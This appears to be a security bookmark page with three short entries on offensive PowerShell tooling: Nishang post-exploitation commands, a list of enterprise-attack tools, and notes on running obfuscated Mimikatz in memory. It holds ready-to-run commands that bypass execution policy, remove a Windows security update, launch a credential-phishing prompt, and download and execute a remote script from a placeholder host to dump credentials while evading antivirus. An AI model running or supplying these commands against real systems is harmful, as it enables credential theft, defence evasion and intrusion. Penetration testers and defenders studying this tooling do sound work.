-
-
Nishang: A Post-Exploitation Framework
February 20, 2019 at 11:00:59 PM UTC - permalink -Port-Scan
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”Remove-Update
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”Invoke-CredentialsPhish
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”- https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
-
Pwning the Enterprise With PowerShell
February 20, 2019 at 10:17:58 PM UTC - permalink -PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...- https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
-
geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls
February 20, 2019 at 2:24:52 PM UTC - permalink -https://github.com/danielbohannon/Invoke-Obfuscation
PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred ...- https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html